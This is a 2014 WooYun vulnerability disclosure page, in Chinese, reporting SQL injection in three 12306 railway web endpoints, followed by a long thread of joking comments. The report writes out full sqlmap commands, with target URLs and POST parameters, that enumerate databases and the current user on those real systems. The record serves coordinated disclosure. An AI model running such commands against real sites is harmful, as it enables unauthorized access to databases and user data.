当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088789

漏洞标题:12306多处SQL注入(涉及某内部系统)

相关厂商:中国铁道科学研究院

漏洞作者: anonymer

提交时间:2014-12-26 17:00

修复时间:2015-02-09 17:02

公开时间:2015-02-09 17:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-26: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-09: 细节向公众公开

简要描述:

打包吧,别一个一个发了

详细说明:

第一处:
12306 邮件系统SQL注入
URL:http://mail.12306.cn/app/mail/login

sqlmap -u "http://mail.12306.cn/app/mail/login" --data "sid=db5402945b7c279bb64b5d0173917ad3&domain=test.com&domain=12306.cn&id=admin&pwd=123456&style=&lang=" --dbs


DataBase:

4.jpg


Tables:

5.png


漏洞证明:

第二处:

sqlmap -u "http://hyfw.12306.cn/hyinfo/action/JgxxAction_hwyjl" --data "lx=jzx" --dbms oracle --batch --current-user


3.png


第三处:

sqlmap -u "http://hyfw.12306.cn/hyinfo/action/JgxxAction_pmplxx" --data "pl=&pm=&plfh=&pmfh=&bs=1" --batch --dbs


DataBase:

1.png


PayLoad:

2.png


修复方案:

希望及时修复

版权声明:转载请注明来源 anonymer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-26 17:45

厂商回复:

评估中,谢谢!

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-26 17:01 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    同志们别一个一个提交了,扯得蛋疼

  2. 2014-12-26 17:05 | Qiudays ( 路人 | Rank:10 漏洞数:9 | 感觉自己萌萌哒)

    你们这样真的好吗?

  3. 2014-12-26 17:05 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    我擦,再也看不下去了

  4. 2014-12-26 17:06 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    SQL注入的数据库里面满满的都是数据

  5. 2014-12-26 17:07 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    我也希望这些注入点都不存在,但是用户提交了,而且我也是用户

  6. 2014-12-26 17:10 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @猪猪侠 想想空间很大

  7. 2014-12-26 17:10 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    想象

  8. 2014-12-26 17:11 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    我刚改的密码,难道有泄露了!

  9. 2014-12-26 17:12 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    敢问XXX能认真对待吗?能对我们老百姓负责吗?对我们广大的用户负责吗?那么大的网站,数据一批一批的泄露,你们就这样无动于衷?

  10. 2014-12-26 17:12 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    这脸打的 漂亮啊

  11. 2014-12-26 17:13 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    我要上电视啊!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!11

  12. 2014-12-26 17:13 | Yang ( 普通白帽子 | Rank:247 漏洞数:86 | 作为菜鸟,大米手机摔破了怎么办?)

    你这样不怕送快递么?@anonymer

  13. 2014-12-26 17:14 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    CCTV看这里,希望这次可以拍到我!

  14. 2014-12-26 17:16 | 小鲜肉 ( 实习白帽子 | Rank:34 漏洞数:6 | 努力学习,不想在浪费时间了。)

    CCAV看这里

  15. 2014-12-26 17:16 | Y4ngshu ( 实习白帽子 | Rank:38 漏洞数:7 | 十年磨一剑。)

    前排占座

  16. 2014-12-26 17:16 | stevenliu ( 路人 | Rank:9 漏洞数:2 | 从事信息网络完全)

    你就不怕收到船票啊 这次的12306是多少亿开发的 哎……!!!

  17. 2014-12-26 17:17 | 野驴~ ( 路人 | Rank:5 漏洞数:2 | 充满强烈好奇心的菜鸟。)

    这次一定要上电视啊。看这里

  18. 2014-12-26 17:19 | 紫衣大侠 ( 普通白帽子 | Rank:201 漏洞数:21 | 愿结天下有识之士)

    啪啪啪~

  19. 2014-12-26 17:21 | 小健客 ( 实习白帽子 | Rank:67 漏洞数:21 | 面具下不止是肉体,还有思想,而思想是不怕...)

    我也来占个位,前面好多人。

  20. 2014-12-26 17:22 | 独步清风 ( 路人 | Rank:0 漏洞数:1 | 崇拜乌云各位大牛。)

    前排关注、、

  21. 2014-12-26 17:22 | he1renyagao ( 普通白帽子 | Rank:225 漏洞数:29 | 是金子总会发光,在还未发光之前,先打磨打...)

    CCTV看这里,希望这次可以拍到我!

  22. 2014-12-26 17:23 | he1renyagao ( 普通白帽子 | Rank:225 漏洞数:29 | 是金子总会发光,在还未发光之前,先打磨打...)

    CCTV看这里,希望这次可以拍到我!

  23. 2014-12-26 17:24 | 10457793 ( 普通白帽子 | Rank:867 漏洞数:128 | 说好的借,为什么从来不还?O(∩_∩)O)

    不能单单用金额来说明12306必须那么完美,每个互联网产品不都是从功能再到安全一点点做的吗?去年已经有很多大牛讨论过12306的设计难度了,大家发现漏洞就提交漏洞,不要再指责什么多少钱的事了!国内厂商唯独需要提高的是态度,态度决定一切!

  24. 2014-12-26 17:28 | 爱捣蛋的鬼 ( 路人 | Rank:19 漏洞数:3 | 爱捣蛋的鬼)

    CCTV看这里,希望这次可以拍到我!

  25. 2014-12-26 17:30 | Wangl ( 实习白帽子 | Rank:33 漏洞数:4 | 新浪支付,值得拥有)

    火钳留名!=================CCTV,看这里=================================妈妈,我终于上电视了。

  26. 2014-12-26 17:41 | akast ( 普通白帽子 | Rank:244 漏洞数:39 | NEURON & LEUKOCYTE)

    这刚补上的CN膜,又又又又被破了,啊啊啊,这可没人要了。

  27. 2014-12-26 17:42 | Excalibur ( 路人 | Rank:0 漏洞数:1 | Ripley Scrowle I shall you tell with pla...)

    感谢CCTV,感谢乌云给我这次上电视的机会。(●'◡'●)ノ♥哥们撑住。

  28. 2014-12-26 17:53 | Alen ( 实习白帽子 | Rank:86 漏洞数:21 | 精华漏洞数:10 | WooYun认证√ Duang)

    葫芦娃葫芦娃,一天多少个洞挖

  29. 2014-12-26 17:53 | 迦南 ( 路人 | Rank:14 漏洞数:11 | 我不是玩黑,我就是认真)

    CCTV看这个里啊

  30. 2014-12-26 17:57 | 泪雨无魂 ( 实习白帽子 | Rank:94 漏洞数:32 )

    我来向大牛们学习学习!

  31. 2014-12-26 18:00 | Topman王 ( 实习白帽子 | Rank:31 漏洞数:6 | 软件开发工程师!白帽子!XSSER,渗透,SEO)

    CCAV看这里,感谢乌云给我这次上电视的机会

  32. 2014-12-26 18:02 | milan ( 普通白帽子 | Rank:129 漏洞数:32 | 妈妈说:搬不完砖就别回家。)

    我要上电视啦

  33. 2014-12-26 18:14 | Arrow ( 路人 | Rank:28 漏洞数:12 )

    我是来看直播的

  34. 2014-12-26 19:01 | quEry ( 路人 | Rank:8 漏洞数:5 )

    我也要上电视!!!

  35. 2014-12-26 21:39 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    大家好,楼上要上电视的都已经被公安部门抓走了。

  36. 2014-12-26 22:42 | 小思 ( 路人 | Rank:17 漏洞数:2 | 乌云杰出青年 | null)

    啊!疼!

  37. 2014-12-27 00:10 | 你大爷在此 百无禁忌 ( 路人 | Rank:10 漏洞数:6 | Hello 各位小伙伴们 大家好 我是王尼玛)

    那么问题来了 我要上报纸 总行了吧

  38. 2014-12-27 06:40 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @你大爷在此 百无禁忌 那么问题来了 我要上杂志 总行了吧

  39. 2014-12-27 10:47 | Non-polar ( 实习白帽子 | Rank:34 漏洞数:16 | 只要还有明天,今天就永远是起跑线)

    @10457793 顶一个,态度决定高度!

  40. 2014-12-27 12:27 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、我要上课本行了吧

  41. 2014-12-27 13:29 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 关注我 即可获得上课本封面机会一次

  42. 2014-12-27 14:32 | todaro ( 实习白帽子 | Rank:39 漏洞数:12 | 完结。)

    来晚了 上我上我

  43. 2014-12-27 15:24 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、 关注我即可获得上@todaro 机会一次

  44. 2014-12-27 17:10 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    哥哥 修复了没有啊

  45. 2014-12-27 17:47 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 关注我即可获得上@凤姐一辈子

  46. 2014-12-27 18:56 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心 关注我即可解锁新姿势一枚。

  47. 2014-12-27 18:56 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、关注我即可解锁新姿势一枚。0-0 @错了。

  48. 2014-12-27 21:48 | H1d3r ( 路人 | Rank:18 漏洞数:2 |  ‮)

    我也要上电视!!!

  49. 2014-12-28 18:17 | Angelic47 ( 路人 | Rank:1 漏洞数:1 )

    妈妈我要上电视啦~CCAV看这里~

  50. 2014-12-29 16:07 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 我要解锁所有姿势,多少rank,开个价。

  51. 2014-12-29 16:38 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、 只需要10rank 即可解锁所有姿势。付款后联系我

  52. 2014-12-29 16:54 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 逗比,问你个事,怎么设置头像?为嘛我没有头像,你个4rank的就有头像?

  53. 2014-12-29 17:01 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、 我也不知道。你不说我都不知道。

  54. 2014-12-29 17:26 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、 好了 我研究出来了。http://zone.wooyun.org/ 这里点击右上角管理,然后修改图像即可

  55. 2014-12-29 17:41 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 谢谢了,不多说,找到我qq,送你一个10rank的洞。

  56. 2014-12-29 18:35 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、你这么吊 我知道不

  57. 2014-12-29 18:49 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 肯定知道啊,百度,360上面都有我qq,找到就算你厉害。关注我把,到时候漏洞里面看得见我qq的。。。

  58. 2014-12-29 18:56 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、 。。好吧 你赢了。

  59. 2014-12-29 18:58 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 大不了我也关注你啦。。。

  60. 2014-12-29 19:25 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、 加QQ

  61. 2014-12-29 19:32 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 自己找去。

  62. 2014-12-29 19:53 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、 终有一天我会把你的菊花挖出来

  63. 2014-12-29 19:58 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 跪求来。。。。

  64. 2014-12-29 22:18 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、 终究会有那么一天

  65. 2014-12-29 22:23 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @飞段 你会被凤姐睡了

  66. 2014-12-30 12:12 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    @无心、 然后把你睡了

  67. 2015-01-26 14:55 | hack雪花 ( 实习白帽子 | Rank:67 漏洞数:18 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    问下这后面参数怎么找的 构造的?lx=jzx

  68. 2015-01-26 18:51 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @hack雪花 吊毛,你好

  69. 2015-02-09 18:00 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    大神,请收下我的膝盖。